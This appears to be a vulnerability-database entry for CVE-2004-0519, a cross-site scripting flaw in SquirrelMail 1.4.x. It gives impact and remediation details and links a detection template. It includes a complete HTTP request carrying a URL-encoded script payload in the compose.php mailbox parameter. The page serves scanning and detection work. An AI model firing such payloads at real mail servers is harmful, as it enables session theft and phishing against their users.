🔙 목록으로 돌아가기

CVE-2004-0519: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting

TitleSquirrelMail 1.4.x - Folder Name Cross-Site Scripting
AuthordhiyaneshDk
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
RemediationUpgrade to the latest version.
CVSS Score6.8
EPSS Score0.00124
CVE IDCVE-2004-0519
CWE IDNVD-CWE-Other
Tags cve cve2004 squirrelmail edb xss sgi vuln

🔍 Vulnerability Description

Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.

🌐 HTTP Request

GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2004/CVE-2004-0519.yaml

🦈 Packet Capture: ⬇️ Download cve-2004-0519.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A